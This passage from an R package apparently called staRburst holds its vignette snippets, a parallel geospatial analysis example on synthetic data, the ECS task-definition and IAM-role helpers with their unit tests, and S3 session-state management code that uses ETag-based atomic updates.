## -----------------------------------------------------------------------------
# # Heavy tasks (minutes each) — the cloud wins
# results <- starburst_map(scenarios, run_expensive_model, workers = 30)
# 
# # Trivially cheap tasks — just do it locally
# results <- lapply(inputs, quick_function)

## -----------------------------------------------------------------------------
# # ❌ DON'T: 10,000 tasks — ~10,000 serial S3 submits from your laptop
# results <- starburst_map(1:10000, evaluate_point, workers = 50)
# 
# # ✅ DO: batch into ~100 chunks — 100 tasks, same 10,000 evaluations
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# results <- starburst_map(batches, function(ids) lapply(ids, evaluate_point),
#                          workers = 50)
# results <- unlist(results, recursive = FALSE)  # flatten

## -----------------------------------------------------------------------------
# per_item_seconds <- 0.5              # measure this on a small local sample
# target_task_seconds <- 120           # aim for ~2 min per task
# batch_size <- ceiling(target_task_seconds / per_item_seconds)  # ~240 here

## -----------------------------------------------------------------------------
# # 200 tasks: ~50 workers is a reasonable ratio (each worker handles ~4 tasks)
# results <- starburst_map(param_sets, fit_model, workers = 50)
# 
# # 200 tasks on 500 workers: 300 workers idle, you pay for all 500 — don't

## -----------------------------------------------------------------------------
# # Cheapest for a one-off: enough workers to cover the tasks, spot on (default)
# starburst_map(tasks, fn, workers = length(tasks), use_spot = TRUE)
# 
# # Repeated runs: a warm pool pays startup once — see the detached-sessions guide

## -----------------------------------------------------------------------------
# # ❌ Hundreds of tasks writing under ONE prefix — throughput bottleneck
# key <- sprintf("s3://bucket/results/%d.parquet", i)
# 
# # ✅ Shard across prefixes so S3 parallelizes the writes
# shard <- i %% 100
# key <- sprintf("s3://bucket/results/shard=%02d/%d.parquet", shard, i)

#!/usr/bin/env Rscript
#
# Parallel Geospatial Analysis Example
#
# This script demonstrates parallel spatial analysis across geographic regions.
# It analyzes store locations, competitors, and customer coverage.
#
# Usage:
#   Rscript geospatial.R
#   # or from R:
#   source(system.file("examples/geospatial.R", package = "starburst"))

library(starburst)

cat("=== Parallel Geospatial Analysis ===\n\n")

# Generate synthetic geospatial data
set.seed(789)

# Define metropolitan regions
regions <- data.frame(
  region_id = 1:20,
  region_name = c("New York", "Los Angeles", "Chicago", "Houston", "Phoenix",
                 "Philadelphia", "San Antonio", "San Diego", "Dallas", "San Jose",
                 "Austin", "Jacksonville", "Fort Worth", "Columbus", "Charlotte",
                 "San Francisco", "Indianapolis", "Seattle", "Denver", "Boston"),
  center_lat = c(40.71, 34.05, 41.88, 29.76, 33.45,
                39.95, 29.42, 32.72, 32.78, 37.34,
                30.27, 30.33, 32.75, 39.96, 35.23,
                37.77, 39.77, 47.61, 39.74, 42.36),
  center_lon = c(-74.01, -118.24, -87.63, -95.37, -112.07,
                -75.17, -98.49, -117.16, -96.80, -121.89,
                -97.74, -81.66, -97.33, -83.00, -80.84,
                -122.42, -86.16, -122.33, -104.99, -71.06),
  stringsAsFactors = FALSE
)

cat("Generating geospatial dataset...\n")

# Generate stores (5 per region)
stores <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_stores <- 5
  data.frame(
    store_id = (i - 1) * n_stores + 1:n_stores,
    region_id = regions$region_id[i],
    region_name = regions$region_name[i],
    latitude = regions$center_lat[i] + rnorm(n_stores, 0, 0.1),
    longitude = regions$center_lon[i] + rnorm(n_stores, 0, 0.1),
    annual_revenue = rlnorm(n_stores, log(1000000), 0.5),
    stringsAsFactors = FALSE
  )
}))

# Generate competitors (10 per region)
competitors <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_competitors <- 10
  data.frame(
    competitor_id = (i - 1) * n_competitors + 1:n_competitors,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_competitors, 0, 0.15),
    longitude = regions$center_lon[i] + rnorm(n_competitors, 0, 0.15),
    stringsAsFactors = FALSE
  )
}))

# Generate customers (1000 per region)
customers <- do.call(rbind, lapply(1:nrow(regions), function(i) {
  n_customers <- 1000
  data.frame(
    customer_id = (i - 1) * n_customers + 1:n_customers,
    region_id = regions$region_id[i],
    latitude = regions$center_lat[i] + rnorm(n_customers, 0, 0.2),
    longitude = regions$center_lon[i] + rnorm(n_customers, 0, 0.2),
    annual_spend = rlnorm(n_customers, log(500), 0.8),
    stringsAsFactors = FALSE
  )
}))

cat(sprintf("✓ Dataset created:\n"))
cat(sprintf("  %d stores across %d regions\n", nrow(stores), nrow(regions)))
cat(sprintf("  %s competitors\n", format(nrow(competitors), big.mark = ",")))
cat(sprintf("  %s customers\n\n", format(nrow(customers), big.mark = ",")))

# Haversine distance function
haversine_distance <- function(lat1, lon1, lat2, lon2) {
  R <- 6371  # Earth's radius in km

  lat1_rad <- lat1 * pi / 180
  lat2_rad <- lat2 * pi / 180
  delta_lat <- (lat2 - lat1) * pi / 180
  delta_lon <- (lon2 - lon1) * pi / 180

  a <- sin(delta_lat/2)^2 +
       cos(lat1_rad) * cos(lat2_rad) * sin(delta_lon/2)^2
  c <- 2 * atan2(sqrt(a), sqrt(1-a))

  R * c
}

# Spatial analysis function
analyze_region <- function(region_id, stores_data, competitors_data,
                          customers_data) {
  region_stores <- stores_data[stores_data$region_id == region_id, ]
  region_competitors <- competitors_data[competitors_data$region_id == region_id, ]
  region_customers <- customers_data[customers_data$region_id == region_id, ]

  if (nrow(region_stores) == 0) {
    return(NULL)
  }

  store_metrics <- lapply(1:nrow(region_stores), function(i) {
    store <- region_stores[i, ]

    # Distance to competitors
    competitor_distances <- sapply(1:nrow(region_competitors), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_competitors$latitude[j], region_competitors$longitude[j]
      )
    })
    nearest_competitor_km <- min(competitor_distances)
    avg_competitor_distance <- mean(competitor_distances)
    competitors_within_5km <- sum(competitor_distances <= 5)

    # Customer coverage
    customer_distances <- sapply(1:nrow(region_customers), function(j) {
      haversine_distance(
        store$latitude, store$longitude,
        region_customers$latitude[j], region_customers$longitude[j]
      )
    })

    customers_1km <- sum(customer_distances <= 1)
    customers_3km <- sum(customer_distances <= 3)
    customers_5km <- sum(customer_distances <= 5)
    customers_10km <- sum(customer_distances <= 10)

    nearby_customers <- region_customers[customer_distances <= 5, ]
    market_potential <- if (nrow(nearby_customers) > 0) {
      sum(nearby_customers$annual_spend)
    } else {
      0
    }

    avg_customer_distance <- mean(customer_distances)
    median_customer_distance <- median(customer_distances)

    area_10km <- pi * 10^2
    customer_density <- customers_10km / area_10km
    competitive_intensity <- min(1, competitors_within_5km / 10)

    data.frame(
      store_id = store$store_id,
      region_id = region_id,
      region_name = store$region_name,
      annual_revenue = store$annual_revenue,
      nearest_competitor_km = nearest_competitor_km,
      avg_competitor_distance = avg_competitor_distance,
      competitors_within_5km = competitors_within_5km,
      customers_1km = customers_1km,
      customers_3km = customers_3km,
      customers_5km = customers_5km,
      customers_10km = customers_10km,
      market_potential = market_potential,
      avg_customer_distance = avg_customer_distance,
      median_customer_distance = median_customer_distance,
      customer_density = customer_density,
      competitive_intensity = competitive_intensity,
      stringsAsFactors = FALSE
    )
  })

  do.call(rbind, store_metrics)
}

# Local benchmark (3 regions)
test_regions <- c(1, 2, 3)

cat(sprintf("Running local benchmark (%d regions)...\n", length(test_regions)))
local_start <- Sys.time()

local_results <- lapply(test_regions, analyze_region,
                       stores_data = stores,
                       competitors_data = competitors,
                       customers_data = customers)
local_metrics <- do.call(rbind, local_results)

local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Processed %d stores\n", nrow(local_metrics)))
cat(sprintf("  Estimated time for all %d regions: %.1f seconds\n\n",
            nrow(regions), local_time * (nrow(regions) / length(test_regions))))

# Cloud execution
n_workers <- 20

cat(sprintf("Analyzing %d regions on %d workers...\n", nrow(regions), n_workers))

cloud_start <- Sys.time()

results <- starburst_map(
  regions$region_id,
  analyze_region,
  stores_data = stores,
  competitors_data = competitors,
  customers_data = customers,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n\n", cloud_time))

# Combine results
spatial_metrics <- do.call(rbind, results)

# Print results
cat("=== Geospatial Analysis Results ===\n\n")
cat(sprintf("Total stores analyzed: %d\n", nrow(spatial_metrics)))
cat(sprintf("Regions covered: %d\n\n", length(unique(spatial_metrics$region_id))))

# Competition analysis
cat("=== Competition Analysis ===\n")
cat(sprintf("Average distance to nearest competitor: %.2f km\n",
            mean(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Median distance to nearest competitor: %.2f km\n",
            median(spatial_metrics$nearest_competitor_km)))
cat(sprintf("Average competitors within 5km: %.1f\n",
            mean(spatial_metrics$competitors_within_5km)))
cat(sprintf("High competition stores (5+ nearby): %d (%.1f%%)\n\n",
            sum(spatial_metrics$competitors_within_5km >= 5),
            mean(spatial_metrics$competitors_within_5km >= 5) * 100))

# Customer coverage
cat("=== Customer Coverage Analysis ===\n")
cat(sprintf("Average customers within 5km: %.0f\n",
            mean(spatial_metrics$customers_5km)))
cat(sprintf("Average market potential (5km): $%.0f\n",
            mean(spatial_metrics$market_potential)))
cat(sprintf("Average customer density: %.1f customers/km²\n",
            mean(spatial_metrics$customer_density)))
cat(sprintf("Median distance to customers: %.2f km\n\n",
            mean(spatial_metrics$median_customer_distance)))

# Performance insights
cat("=== Performance Insights ===\n")
correlation <- cor(spatial_metrics$annual_revenue,
                   spatial_metrics$market_potential)
cat(sprintf("Correlation (revenue vs market potential): %.3f\n\n", correlation))

# Opportunity stores
opportunity_stores <- spatial_metrics[
  spatial_metrics$market_potential > median(spatial_metrics$market_potential) &
  spatial_metrics$competitors_within_5km < median(spatial_metrics$competitors_within_5km),
]
cat(sprintf("High opportunity stores: %d\n", nrow(opportunity_stores)))
if (nrow(opportunity_stores) > 0) {
  cat(sprintf("  Avg market potential: $%.0f\n",
              mean(opportunity_stores$market_potential)))
  cat(sprintf("  Avg competitors nearby: %.1f\n\n",
              mean(opportunity_stores$competitors_within_5km)))
}

# Top regions
cat("=== Top 5 Regions by Market Potential ===\n")
region_summary <- aggregate(market_potential ~ region_name,
                           data = spatial_metrics, FUN = mean)
region_summary <- region_summary[order(-region_summary$market_potential), ]
for (i in 1:min(5, nrow(region_summary))) {
  cat(sprintf("%d. %s: $%.0f\n", i,
              region_summary$region_name[i],
              region_summary$market_potential[i]))
}

# Performance comparison
cat("\n=== Performance Comparison ===\n\n")
estimated_local <- local_time * (nrow(regions) / length(test_regions))
speedup <- estimated_local / cloud_time
cat(sprintf("Local (estimated): %.1f seconds\n", estimated_local))
cat(sprintf("Cloud (%d workers): %.1f seconds\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

cat("\n✓ Done!\n")

#' ECS task definitions, IAM roles, and log groups for staRburst
#'
#' @name task-definition
#' @keywords internal
NULL

#' Ensure CloudWatch log group exists
#'
#' @keywords internal
ensure_log_group <- function(log_group_name, region) {
  logs <- paws.management::cloudwatchlogs(
    config = list(
      credentials = list(profile = Sys.getenv("AWS_PROFILE", "default")),
      region = region
    )
  )

  # Check if log group exists
  log_group_exists <- FALSE
  tryCatch({
    result <- logs$describe_log_groups(logGroupNamePrefix = log_group_name)

    # If log group exists with exact name match, return
    if (length(result$logGroups) > 0) {
      for (lg in result$logGroups) {
        if (lg$logGroupName == log_group_name) {
          log_group_exists <- TRUE
          break
        }
      }
    }
  }, error = function(e) {
    # ResourceNotFoundException means log group doesn't exist
    if (grepl("ResourceNotFoundException", e$message)) {
      log_group_exists <<- FALSE
    } else {
      stop(e)
    }
  })

  if (log_group_exists) {
    return(invisible(NULL))
  }

  # Create log group if it doesn't exist
  tryCatch({
    logs$create_log_group(logGroupName = log_group_name)
    cat_info(sprintf("   * Created log group: %s\n", log_group_name))
  }, error = function(e) {
    # Ignore if already exists
    if (!grepl("ResourceAlreadyExistsException", e$message)) {
      stop(e)
    }
  })
}

#' Get IAM execution role ARN
#'
#' Returns the ARN for the ECS execution role (should be created during setup)
#'
#' @keywords internal
get_execution_role_arn <- function(region) {
  config <- get_starburst_config()

  # Use role from config if available
  if (!is.null(config$execution_role_arn)) {
    return(config$execution_role_arn)
  }

  # Return default role ARN
  aws_account_id <- config$aws_account_id
  role_name <- "starburstECSExecutionRole"

  sprintf("arn:aws:iam::%s:role/%s", aws_account_id, role_name)
}

#' Get IAM task role ARN
#'
#' Returns the ARN for the ECS task role (should be created during setup)
#'
#' @keywords internal
get_task_role_arn <- function(region) {
  config <- get_starburst_config()

  # Use role from config if available
  if (!is.null(config$task_role_arn)) {
    return(config$task_role_arn)
  }

  # Return default role ARN
  aws_account_id <- config$aws_account_id
  role_name <- "starburstECSTaskRole"

  sprintf("arn:aws:iam::%s:role/%s", aws_account_id, role_name)
}

#' Get or create task definition
#'
#' @keywords internal
get_or_create_task_definition <- function(plan) {
  cat_info("[Info] Preparing task definition...\n")

  ecs <- get_ecs_client(plan$region)
  config <- get_starburst_config()

  # Calculate CPU and memory in ECS units
  # CPU: 1 vCPU = 1024 units
  cpu <- plan$cpu %||% plan$worker_cpu
  cpu_units <- as.character(as.integer(cpu * 1024))

  # Memory in MB (parse from string like "8GB")
  memory <- plan$memory %||% plan$worker_memory
  if (is.character(memory)) {
    memory <- as.numeric(gsub("[^0-9.]", "", memory))
  }
  memory_mb <- as.character(as.integer(memory * 1024))

  # Ensure log group exists
  log_group_name <- "/aws/ecs/starburst-worker"
  ensure_log_group(log_group_name, plan$region)

  # Get IAM roles
  execution_role_arn <- get_execution_role_arn(plan$region)
  task_role_arn <- get_task_role_arn(plan$region)

  # Check for existing compatible task definition
  family_name <- "starburst-worker"

  tryCatch({
    task_defs <- ecs$list_task_definitions(
      familyPrefix = family_name,
      status = "ACTIVE",
      sort = "DESC",
      maxResults = 10
    )

    # Check if any existing task definition matches our requirements
    for (task_def_arn in task_defs$taskDefinitionArns) {
      task_def <- ecs$describe_task_definition(taskDefinition = task_def_arn)$taskDefinition

      # Check if CPU, memory, image, and launch type match
      if (task_def$cpu == cpu_units &&
          task_def$memory == memory_mb &&
          length(task_def$containerDefinitions) > 0) {

        # Check image
        container_def <- task_def$containerDefinitions[[1]]
        if (container_def$image != plan$image_uri) {
          next
        }

        # Check launch type compatibility
        launch_type <- plan$launch_type %||% "FARGATE"
        compatibilities <- task_def$requiresCompatibilities %||% list()

        if (!launch_type %in% compatibilities) {
          next
        }

        # For EC2, also check runtimePlatform matches
        if (launch_type == "EC2") {
          expected_arch <- plan$architecture %||% "X86_64"
          actual_arch <- task_def$runtimePlatform$cpuArchitecture %||% "X86_64"

          if (actual_arch != expected_arch) {
            next
          }
        }

        cat_success(sprintf("[OK] Using existing task definition: %s\n", task_def$taskDefinitionArn))
        return(task_def$taskDefinitionArn)
      }
    }
  }, error = function(e) {
    # Continue to create new task definition
  })

  # Create new task definition
  cat_info("   * Registering new task definition...\n")
  cat_info(sprintf("     CPU: %s units, Memory: %s MB\n", cpu_units, memory_mb))

  # For Fargate, container-level memory can be omitted if task-level memory is set
  # But we'll include it to ensure proper resource allocation
  container_memory <- as.integer(memory_mb)

  container_def <- list(
    name = "starburst-worker",
    image = plan$image_uri,
    cpu = 0,  # Not specifying container-level CPU for Fargate
    memory = container_memory,
    essential = TRUE,
    environment = list(),  # Empty environment variables
    logConfiguration = list(
      logDriver = "awslogs",
      options = list(
        "awslogs-group" = log_group_name,
        "awslogs-region" = plan$region,
        "awslogs-stream-prefix" = "starburst"
      )
    )
  )

  cat_info(sprintf("     Container memory: %d MB\n", container_memory))

  # Build task definition parameters
  task_def_params <- list(
    family = family_name,
    networkMode = "awsvpc",
    cpu = cpu_units,
    memory = memory_mb,
    executionRoleArn = execution_role_arn,
    taskRoleArn = task_role_arn,
    containerDefinitions = list(container_def)
  )

  # Add launch type specific parameters
  if (!is.null(plan$launch_type) && plan$launch_type == "EC2") {
    task_def_params$requiresCompatibilities <- list("EC2")
    task_def_params$runtimePlatform <- list(
      cpuArchitecture = plan$architecture,
      operatingSystemFamily = "LINUX"
    )
    cat_info(sprintf("     Launch type: EC2, Architecture: %s\n", plan$architecture))
  } else {
    task_def_params$requiresCompatibilities <- list("FARGATE")
    cat_info("     Launch type: FARGATE\n")
  }

  response <- do.call(ecs$register_task_definition, task_def_params)

  task_def_arn <- response$taskDefinition$taskDefinitionArn
  cat_success(sprintf("[OK] Task definition registered: %s\n", task_def_arn))

  return(task_def_arn)
}

test_that("ensure_log_group creates log group if missing", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock cloudwatchlogs client
  logs_client <- list(
    describe_log_groups = function(...) {
      stop("ResourceNotFoundException")
    },
    create_log_group = function(...) {
      list()
    }
  )

  mockery::stub(ensure_log_group, "paws.management::cloudwatchlogs", function(...) {
    logs_client
  })

  # Should not error
  expect_error(ensure_log_group("/aws/ecs/test", "us-east-1"), NA)
})

test_that("get_execution_role_arn returns configured role", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  mockery::stub(get_execution_role_arn, "get_starburst_config", function() {
    list(execution_role_arn = "arn:aws:iam::123456789012:role/test-role")
  })

  result <- get_execution_role_arn("us-east-1")
  expect_equal(result, "arn:aws:iam::123456789012:role/test-role")
})

test_that("get_execution_role_arn constructs default ARN", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  mockery::stub(get_execution_role_arn, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })

  result <- get_execution_role_arn("us-east-1")
  expect_equal(result, "arn:aws:iam::123456789012:role/starburstECSExecutionRole")
})

test_that("get_task_role_arn constructs default ARN", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  mockery::stub(get_task_role_arn, "get_starburst_config", function() {
    list(aws_account_id = "123456789012")
  })

  result <- get_task_role_arn("us-east-1")
  expect_equal(result, "arn:aws:iam::123456789012:role/starburstECSTaskRole")
})

test_that("get_or_create_task_definition uses existing compatible task def", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock plan object
  plan <- list(
    region = "us-east-1",
    worker_cpu = 2,
    worker_memory = 8,
    image_uri = "123456789012.dkr.ecr.us-east-1.amazonaws.com/test:latest"
  )

  # Mock ECS client
  ecs_client <- list(
    list_task_definitions = function(...) {
      list(taskDefinitionArns = list("arn:aws:ecs:us-east-1:123456789012:task-definition/test:1"))
    },
    describe_task_definition = function(...) {
      list(
        taskDefinition = list(
          taskDefinitionArn = "arn:aws:ecs:us-east-1:123456789012:task-definition/test:1",
          cpu = "2048",
          memory = "8192",
          requiresCompatibilities = list("FARGATE"),
          containerDefinitions = list(
            list(image = "123456789012.dkr.ecr.us-east-1.amazonaws.com/test:latest")
          )
        )
      )
    }
  )

  mockery::stub(get_or_create_task_definition, "get_ecs_client", function(...) {
    ecs_client
  })

  mockery::stub(get_or_create_task_definition, "get_starburst_config", function() {
    list()
  })

  mockery::stub(get_or_create_task_definition, "ensure_log_group", function(...) {})
  mockery::stub(get_or_create_task_definition, "get_execution_role_arn", function(...) {
    "arn:aws:iam::123456789012:role/exec-role"
  })
  mockery::stub(get_or_create_task_definition, "get_task_role_arn", function(...) {
    "arn:aws:iam::123456789012:role/task-role"
  })

  result <- get_or_create_task_definition(plan)

  expect_equal(result, "arn:aws:ecs:us-east-1:123456789012:task-definition/test:1")
})

test_that("get_or_create_task_definition creates new task def if needed", {
  skip_on_cran()
  skip_if_not_installed("mockery")

  # Mock plan object
  plan <- list(
    region = "us-east-1",
    worker_cpu = 2,
    worker_memory = 8,
    image_uri = "123456789012.dkr.ecr.us-east-1.amazonaws.com/test:latest"
  )

  registered <- FALSE

  # Mock ECS client
  ecs_client <- list(
    list_task_definitions = function(...) {
      list(taskDefinitionArns = list())
    },
    register_task_definition = function(...) {
      registered <<- TRUE
      list(
        taskDefinition = list(
          taskDefinitionArn = "arn:aws:ecs:us-east-1:123456789012:task-definition/test:1"
        )
      )
    }
  )

  mockery::stub(get_or_create_task_definition, "get_ecs_client", function(...) {
    ecs_client
  })

  mockery::stub(get_or_create_task_definition, "get_starburst_config", function() {
    list()
  })

  mockery::stub(get_or_create_task_definition, "ensure_log_group", function(...) {})
  mockery::stub(get_or_create_task_definition, "get_execution_role_arn", function(...) {
    "arn:aws:iam::123456789012:role/exec-role"
  })
  mockery::stub(get_or_create_task_definition, "get_task_role_arn", function(...) {
    "arn:aws:iam::123456789012:role/task-role"
  })

  result <- get_or_create_task_definition(plan)

  expect_true(registered)
  expect_equal(result, "arn:aws:ecs:us-east-1:123456789012:task-definition/test:1")
})

#' S3 Session State Management
#'
#' Core S3 operations for managing detached session state
#'
#' @name session-state
#' @keywords internal
NULL

#' Create session manifest in S3
#'
#' @param session_id Unique session identifier
#' @param backend Backend configuration
#' @return Invisibly returns NULL
#' @keywords internal
create_session_manifest <- function(session_id, backend) {
  s3 <- get_s3_client(backend$region)
  bucket <- backend$bucket

  manifest <- list(
    session_id = session_id,
    created_at = Sys.time(),
    last_activity = Sys.time(),
    absolute_timeout = Sys.time() + backend$absolute_timeout,
    backend = list(
      workers = backend$workers,
      cpu = backend$cpu,
      memory = backend$memory,
      region = backend$region,
      bucket = backend$bucket,
      timeout = backend$timeout,
      image_uri = backend$image_uri,
      cluster = backend$cluster,
      cluster_name = backend$cluster_name,
      launch_type = backend$launch_type,
      instance_type = backend$instance_type,
      use_spot = backend$use_spot,
      architecture = backend$architecture,
      warm_pool_timeout = backend$warm_pool_timeout,
      capacity_provider_name = backend$capacity_provider_name,
      asg_name = backend$asg_name,
      aws_account_id = backend$aws_account_id,
      subnets = backend$subnets,
      security_groups = backend$security_groups,
      task_definition_arn = backend$task_definition_arn
    ),
    stats = list(
      total_tasks = 0,
      pending = 0,
      running = 0,
      completed = 0,
      failed = 0
    )
  )

  # Upload manifest to S3
  manifest_key <- sprintf("sessions/%s/manifest.qs", session_id)
  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file), add = TRUE)

  qs2::qs_save(manifest, temp_file)

  s3$put_object(
    Bucket = bucket,
    Key = manifest_key,
    Body = temp_file
  )

  invisible(NULL)
}

#' Update session manifest atomically
#'
#' Uses S3 ETags for optimistic locking to prevent race conditions.
#'
#' @param session_id Session identifier
#' @param updates Named list of fields to update
#' @param region AWS region
#' @param bucket S3 bucket
#' @param max_retries Maximum number of retry attempts (default: 3)
#' @return Invisibly returns updated manifest
#' @keywords internal
update_session_manifest <- function(session_id, updates, region, bucket, max_retries = 3) {
  s3 <- get_s3_client(region)
  manifest_key <- sprintf("sessions/%s/manifest.qs", session_id)

  last_error <- NULL

  for (attempt in seq_len(max_retries)) {
    tryCatch({
      # 1. Get current manifest WITH ETag
      temp_file <- tempfile(fileext = ".qs")
      on.exit(unlink(temp_file), add = TRUE)

      # Get object with retry logic
      response <- with_s3_retry(
        {
          s3$get_object(
            Bucket = bucket,
            Key = manifest_key
          )
        },
        max_attempts = 3,
        operation_name = "S3 GetObject (manifest)"
      )

      # Extract ETag for conditional write
      etag <- response$ETag

      # Download object body
      writeBin(response$Body, temp_file)
      manifest <- qs2::qs_read(temp_file)

      # 2. Apply updates
      for (name in names(updates)) {
        if (name == "stats") {
          # Update stats fields
          for (stat_name in names(updates$stats)) {
            manifest$stats[[stat_name]] <- updates$stats[[stat_name]]
          }
        } else {
          manifest[[name]] <- updates[[name]]
        }
      }

      # Update last_activity
      manifest$last_activity <- Sys.time()

      # 3. Save updated manifest
      qs2::qs_save(manifest, temp_file)

      # 4. Upload ATOMICALLY with conditional write
      # This only succeeds if ETag matches (i.e., object hasn't changed)
      s3$put_object(
        Bucket = bucket,
        Key = manifest_key,
        Body = temp_file,
        IfMatch = etag  # Conditional write - only if unchanged
      )

      # Success - return updated manifest
      return(invisible(manifest))

    }, error = function(e) {
      last_error <<- e

      # Check if error is due to ETag mismatch (precondition failed)
      if (grepl("PreconditionFailed|412", e$message, ignore.case = TRUE)) {
        # Another update happened concurrently, retry
        if (attempt < max_retries) {
          # Exponential backoff with jitter
          delay <- runif(1, 0.1, 0.5) * (2 ^ (attempt - 1))
          cat_warn(sprintf("  [WARNING] Concurrent update detected (attempt %d/%d), retrying in %.2fs...\n",
                          attempt, max_retries, delay))
          Sys.sleep(delay)
          # Continue to next iteration
        } else {
          # Exhausted retries
          stop(sprintf("Failed to update manifest after %d retries due to concurrent modifications",
                      max_retries))
        }
      } else {
        # Non-retryable error - fail immediately
        stop(e)
      }
    })
  }

  # Should only reach here if all retries exhausted
  stop(last_error)
}

#' Get session manifest from S3
#'
#' @param session_id Session identifier
#' @param region AWS region
#' @param bucket S3 bucket
#' @return Session manifest list
#' @keywords internal
get_session_manifest <- function(session_id, region, bucket) {
  s3 <- get_s3_client(region)
  manifest_key <- sprintf("sessions/%s/manifest.qs", session_id)

  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file), add = TRUE)

  tryCatch({
    s3$download_file(
      Bucket = bucket,
      Key = manifest_key,
      Filename = temp_file
    )

    qs2::qs_read(temp_file)
  }, error = function(e) {
    stop(sprintf("Session not found: %s", session_id))
  })
}

#' Create task status in S3
#'
#' @param session_id Session identifier
#' @param task_id Task identifier
#' @param state Initial state (default: "pending")
#' @param region AWS region
#' @param bucket S3 bucket
#' @return Invisibly returns NULL
#' @keywords internal
create_task_status <- function(session_id, task_id, state = "pending", region, bucket) {
  s3 <- get_s3_client(region)

  status <- list(
    task_id = task_id,
    state = state,
    created_at = Sys.time(),
    claimed_at = NULL,
    claimed_by = NULL,
    started_at = NULL,
    completed_at = NULL,
    error = NULL
  )

  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)
  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file), add = TRUE)

  qs2::qs_save(status, temp_file)

  s3$put_object(
    Bucket = bucket,
    Key = status_key,
    Body = temp_file
  )

  invisible(NULL)
}

#' Update task status with atomic write
#'
#' @param session_id Session identifier
#' @param task_id Task identifier
#' @param state New state
#' @param etag Optional ETag for conditional write (atomic claiming)
#' @param region AWS region
#' @param bucket S3 bucket
#' @param updates Optional additional fields to update
#' @return TRUE if successful, FALSE if conditional write failed
#' @keywords internal
update_task_status <- function(session_id, task_id, state, etag = NULL,
                               region, bucket, updates = list()) {
  s3 <- get_s3_client(region)
  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)

  # Download current status
  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file), add = TRUE)

  tryCatch({
    s3$download_file(
      Bucket = bucket,
      Key = status_key,
      Filename = temp_file
    )

    status <- qs2::qs_read(temp_file)

    # Update state
    status$state <- state

    # Apply additional updates
    for (name in names(updates)) {
      status[[name]] <- updates[[name]]
    }

    # Save updated status
    qs2::qs_save(status, temp_file)

    # Conditional put if ETag provided
    put_params <- list(
      Bucket = bucket,
      Key = status_key,
      Body = temp_file
    )

    if (!is.null(etag)) {
      put_params$IfMatch <- etag
    }

    do.call(s3$put_object, put_params)

    return(TRUE)

  }, error = function(e) {
    # Check if it's a precondition failed error
    if (!is.null(etag) && grepl("PreconditionFailed|412", e$message)) {
      return(FALSE)
    }
    stop(e)
  })
}

#' Get task status from S3
#'
#' @param session_id Session identifier
#' @param task_id Task identifier
#' @param region AWS region
#' @param bucket S3 bucket
#' @param include_etag Include ETag in result (for atomic operations)
#' @return Task status list (with optional $etag field)
#' @keywords internal
get_task_status <- function(session_id, task_id, region, bucket, include_etag = FALSE) {
  s3 <- get_s3_client(region)
  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)

  if (include_etag) {
    # Use get_object to retrieve ETag
    response <- s3$get_object(
      Bucket = bucket,
      Key = status_key
    )

    temp_file <- tempfile(fileext = ".qs")
    on.exit(unlink(temp_file), add = TRUE)

    writeBin(response$Body, temp_file)
    status <- qs2::qs_read(temp_file)
    status$etag <- response$ETag

    return(status)
  } else {
    # Simple download
    temp_file <- tempfile(fileext = ".qs")
    on.exit(unlink(temp_file), add = TRUE)

    s3$download_file(
      Bucket = bucket,
      Key = status_key,
      Filename = temp_file
    )

    qs2::qs_read(temp_file)
  }
}

#' List pending tasks in session
#'
#' @param session_id Session identifier
#' @param region AWS region
#' @param bucket S3 bucket
#' @return Character vector of pending task IDs
#' @keywords internal
list_pending_tasks <- function(session_id, region, bucket) {
  s3 <- get_s3_client(region)
  prefix <- sprintf("sessions/%s/tasks/", session_id)

  # List all task status files
  result <- s3$list_objects_v2(
    Bucket = bucket,
    Prefix = prefix
  )

  if (length(result$Contents) == 0) {
    return(character(0))
  }

  pending_tasks <- character(0)

  # Check each task status
  for (obj in result$Contents) {
    # Extract task_id from key (sessions/{session}/tasks/{task_id}/status.qs)
    key <- obj$Key
    if (!grepl("/status\\.qs$", key)) next

    key_parts <- strsplit(key, "/")[[1]]
    task_id <- key_parts[4]

    # Download and check status
    temp_file <- tempfile(fileext = ".qs")
    tryCatch({
      s3$download_file(
        Bucket = bucket,
        Key = key,
        Filename = temp_file
      )

      status <- qs2::qs_read(temp_file)

      if (status$state == "pending") {
        pending_tasks <- c(pending_tasks, task_id)
      }
    }, error = function(e) {
      # Skip if error reading status
    }, finally = {
      unlink(temp_file)
    })
  }

  pending_tasks
}

#' List all task statuses in session
#'
#' @param session_id Session identifier
#' @param region AWS region
#' @param bucket S3 bucket
#' @return Named list of task statuses (task_id -> status)
#' @keywords internal
list_task_statuses <- function(session_id, region, bucket) {
  s3 <- get_s3_client(region)
  prefix <- sprintf("sessions/%s/tasks/", session_id)

  # List all task status files
  result <- s3$list_objects_v2(
    Bucket = bucket,
    Prefix = prefix
  )

  if (length(result$Contents) == 0) {
    return(list())
  }

  statuses <- list()

  # Read each task status
  for (obj in result$Contents) {
    key <- obj$Key
    if (!grepl("/status\\.qs$", key)) next

    # Extract task_id
    key_parts <- strsplit(key, "/")[[1]]
